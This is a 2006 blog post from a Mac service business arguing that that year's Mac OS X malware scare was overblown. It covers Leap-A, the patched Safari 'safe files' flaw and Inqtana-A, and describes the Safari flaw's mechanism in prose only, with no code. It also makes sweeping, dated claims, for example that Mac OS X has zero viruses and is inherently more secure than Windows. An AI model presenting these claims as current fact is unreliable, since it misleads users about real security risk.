Connare Tech: Owner’s Corner

My parents are the type that are paranoid about identity theft and are always worried about the world at large compromising their sensitive financial data. So naturally when they read about the new mac viruses, my mother called me up specifically to ask whether or not it was still ok to submit her credit card information over the internet. As soon as this happened, I knew that something was wrong.

The short month of February brought with it huge media frenzy about the first Mac OS X viruses. Many were saying that it was only a matter of time before the mac, with no viruses, would be targeted and then it would be a domino effect following with spyware, malware, popups, basically all of the things that mac users get to laugh at would no longer be laughing.

• Business Week: Macs, Safe No More? - Recent malware outbreaks suggest that Apple’s computers are now targets of viruses and trojans.
• USA Today: Security Scares Mount for Apple Macintosh Users
• E*Week: Apple’s Switch to Intel Could Allow OS X Exploits
• and the list goes on and on.

It is true that past month saw “viruses”, as coined by the media, for the Mac OS X platform. The first is called OSX/Leap.A or OS X/Oompa-A, the second is a flaw that affects Apple’s popular web browser Safari, and the third is a “worm” that spreads through a vulnerability through Bluetooth wireless technology coined OSX/Inqtana-A. However, none of these “viruses” actually exist in the wild, and are merely either proof of concepts or vulnerabilities.

OS X/Leap.A/Oompa-A

” Leap-A, which appears to affect only the OS X 10.4 platform, spreads primarily via the Apple iChat instant-messaging program. The program forwards itself as a compressed file called “latestpics.tgz” to all the contacts on the infected user’s buddy list each time the program starts up.

But it’s up to the person to download the file, which shows up as an attachment to a conversation thread. If downloaded, the self-executable file masquerades with an icon typically reserved for image files but does not activate itself unless opened. (CNet.com)”

Even if someone does send you the “latestpics.tgz” file, your computer will not be infected unless you explicitly unzip the file, open it and then provide the computer with your password so it can run.

“The Leap-A malware was a poorly-programmed Trojan horse that relied on “social engineering,” or trickery to perform its nasty function. There’s a simple way to protect against this kind of threat — common sense — and in testament to this, a lot of people didn’t fall for it.

I’m not going to catch a virus this way any more than I’m going to send money to the honorable Dr. Mobuntu, head of the Central Bank of Nigeria.

When it comes to Leap-A, I’ll continue practicing the same common-sense precautions I take when using a Windows machine, like not opening any “nude pictures” of Britney Spears I get in e-mail.(Wired)” writes Leander Kahney.

Apple’s Official Policy concerning this is: “Leap-A is not a virus, it is malicious software that requires a user to download the application and execute the resulting file. Apple always advises Macintosh users to only accept files from vendors and Web sites that they know and trust.” Apple provides a guide to safely handling files received from the Internet here.

Safari Critical Flaw

This flaw is indeed critical, however it is was released as a proof of concept flaw. This means that the exploit has been proven to exist and can occur but to date there have been no mention of systems being actually affected (more on “proof of concept” further in the article).

“The option to “Open ’safe’ files after downloading” in Apple’s Safari web browser has an issue. “This feature is activated by default. Its function is to automatically display images and movies after they are transmitted to the user’s computer, using the application assigned to that particular document format. Safari will also unpack ZIP archives and display the documents within if they are considered ’safe.’ If active content such as an application or shell script is found within the archive, a prompt requests user confirmation. So far, so good,” Heise Online reports. “Problems ensue if a shell script is stored into a ZIP archive without the so-called shebang line. If this line is omitted, Safari no longer recognizes the content as potentially dangerous and executes shell commands without a confirmation prompt. This behavior has been discovered by Michael Lehn, who has documented it on a web site.(Heise Online).”

The simple solution to this flaw is simply to disable open safe files after downloading in Safari preferences.

Since the exposure of these flaws Apple has released a security update that addresses both of these issues. The Apple Security Update 2006-001 available via Software Update or download from Apple’s Support Site. Apple specifically says the following is addressed in this update

• iChat. A malicious application named Leap.A that attempts to propagate using iChat has been detected. With this update for Mac OS X v10.4.5 and Mac OS X Server v10.4.5, iChat now uses Download Validation to warn of unknown or unsafe file types during file transfers
• Safari, LaunchServicesCVE-ID: CVE-2006-0848Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X v10.4.5, Mac OS X Server v10.4.5Impact: Viewing a malicious web site may result in arbitrary code executionDescription: It is possible to construct a file which appears to be a safe file type, such as an image or movie, but is actually an application. When the “Open `safe’ files after downloading” option is enabled in Safari’s General preferences, visiting a malicious web site may result in the automatic download and execution of such a file. A proof-of-concept has been detected on public web sites that demonstrates the automatic execution of shell scripts. This update addresses the issue by performing additional download validation so that the user is warned (in Mac OS X v10.4.5) or the download is not automatically opened (in Mac OS X v10.3.9).

OSX/Inqtana-A

This flaw was fixed in June of 2005 and is addressed in Apple security update 2005-005, so why it is now receiving press attention in February 2006, as if it is a brand new “virus” or “security hole” found, is unknown to me.

Mac OS X Security vs. Windows Security

First and foremost concerning these “viruses” for Mac OS X as it stands there are still NO cases of Mac OS X viruses, ZERO. Second if you have the latest apple updates, you are not affected by these flaws that have been posted. Bingo, done no worries. So now that this has been addressed, lets go on.

Many are worrying that more mac viruses and such will occur because Apple is now using Intel processors, the same processors that run Windows. All major viruses out there, take advantage of the flaws and bugs in the operating system itself, not the hardware components that the operating system runs on. It’s like saying like we all use gas to power our cars, but if something is wrong with a honda it doesn’t mean that that same thing is going to be wrong with a ford.

Now that is not to say that Mac OS X platform is not vulnerable. No system is 100% safe as any system is going to have bugs and flaws. The difference is when these flaws and bugs are exploited. The Mac, which is based on UNIX is inherently more secure because of the way it functions and operates in comparison to windows. The mac, like windows, has security advisories released each month.
Many people are bringing to light the number of security advisories out there for Mac OS X. Yes, they exist, again no system is 100% safe. However, these security advisories have been constant since Mac OS X’s conception. Just because there is a flaw or bug in a system does not mean that it will result in a virus being released. In fact Mac OS X has almost close to the same number of security advisories as windows for the past few years as is shown by the following charts.

However just because a vulnerability exists doesn’t mean that it is going to harm anyone. In order for a vulnerability to affect people there has to be a working exploit. Apple releases fixes every so often to fix these vulnerabilities just like Microsoft releases patches to fix it’s flaws. The Safari web browser exploit, was a proof of concept, there were no working malicious exploits and this issue has since been addressed! Since Mac OS X is based upon UNIX, many of the components and all of their code is already out there on the web. Thus all of the flaws and vulnerabilities are already exposed. In fact ” many of the fixes in typical Mac OS X security updates aren’t Mac-specific,” Gruber says, “but rather are updates to open-source components and tools.” This helps to make sure that Mac OS X’s unix underpinnings are kept up to date with the open-source communities updates, fixes and contributions.

The difference in vulnerabilities and exploits is one of the key differences concerning security in Mac OS X vs. Windows. Almost all vulnerabilities in Windows are exploits, whereas due to the Mac OS X system architecture this is not the case, and is why Mac OS X is inherently more secure than Windows.

• “Windows comes with five of its ports open; Mac OS X comes with all of them shut and locked. (Ports are back-door channels to the Internet: one for instant-messaging, one for Windows XP’s remote-control feature, and so on.)(NY Times).” Ports are like doors from your computer to the internet. If you have doors open that you don’t even know exist, so as a result you can’t close them, of course it is going to be easier for a hacker to compromise your system. “At the very least, from the all-important network perspective, unlike Windows, Mac OS X ships with nearly all internet services turned off by default. Place an out-of-the-box Mac OS X installation on a network, and an attacker doesn’t have much to target in trying to compromise your system. A default installation of Windows, on the other hand, shows up like a big red bulls-eye on a network with numerous network services enabled and running.* And, unlike Windows, with Mac OS X, there’s no hard-to-disable (for average users afraid to tweak things unfamiliar to them, that is) “Messaging Services” that results in spam-like advertisements coming into the system by way of Windows-based pop-up message boxes. And, the Unix-based Mac OS X system firewall – simple enough protection for most users — is enabled by default (in Mac OSX Server) and easy to find and configure in Mac OS X Client software (not that there’s much that users need to worry about out-of-the-box anyway) — something that Microsoft only recently realized was a good idea and acknowledged should be done in Windows clients as well. (The Register) “
• “When a program tries to install itself in Mac OS X or Linux, a dialog box interrupts your work and asks you permission for that installation — in fact, requires your account password. Windows XP goes ahead and installs it, potentially without your awareness(NY Times).” Whenever a program needs to install something, those familiar to the Mac OS X system will see the password dialog box popup. Obviously if you do not know what is going on, and did not request for an application to be installed your not going to input your password, thus the virus or what have you will be defeated before it can even be activated. The fact that many commercial programs for windows present an interface when they install things is just conveninece. As stated from the NY Times article when you install something on Windows, your account password is not requested. So viruses just have to do this in the background and since there is no interface to view its activity, it appears invisible to the user.
• “Unlike Windows, Mac OS X requires an administrator password to change certain configurations, run the system updater, and when installing new software. From a security perspective, this is another example of how Apple takes a proactive approach to system-level security. If a virus, remote hacker, or co-worker tries to install or reconfigure something on the system, they’re stymied without knowing the administrator’s password stored in the hardened System Keychain. (Incidentally, this password is not the same as the Unix ‘root’ account password of the system’s FreeBSD foundation, something that further enhances security.) In some ways, this can be seen as Mac OS X protecting a careless user from themself as well as others. (The Register)” “Administrator accounts in Windows (and therefore viruses that exploit it) have access to all areas of the operating system. In Mac OS X, even an administrator can’t touch the files that drive the operating system itself. A Mac OS X virus (if there were such a thing) could theoretically wipe out all of your files, but wouldn’t be able to access anyone else’s stuff — and couldn’t touch the operating system itself (NY Times).” The core of Mac OS X lies in /System/Library, and the only account that can modify this is the root account. All other modifications occur in /Library and ~/Library so even if a program was granted access to modify the system it would not hinder the core operations of the computer itself.

A study done by the SANS Institute Internet Storm Center reveals that “an unpatched Windows PC connected to the Internet will last for only about 20 minutes before it’s compromised by malware, on average. That figure is down from around 40 minutes, the group’s estimate in 2003. (CNet.com)” “As the SANS Institute notes, 20 minutes is not long enough to update your Windows PC before it is too late.(The Register) ” The full report is available here.

If any of my clients can prove that their Mac has been infected with a virus, I will personally buy them a new $2000 system of their choice. “You have to be able to prove that a Mac running Mac OS X (version 10.0 or greater, and patched to the latest security level available at the time from Apple) was accidentally and detrimentally infected with a virus that exploited a flaw in the base Mac OS X installation. Your computer must have SUFFERED FROM A REAL, LIVE VIRUS THAT ALREADY EXISTED! (Whilshipley.com)”, and was both able to spread and infect. Your system will not count if it was infected from a “virus” that was merely created to show that viruses can exist on Mac OS X.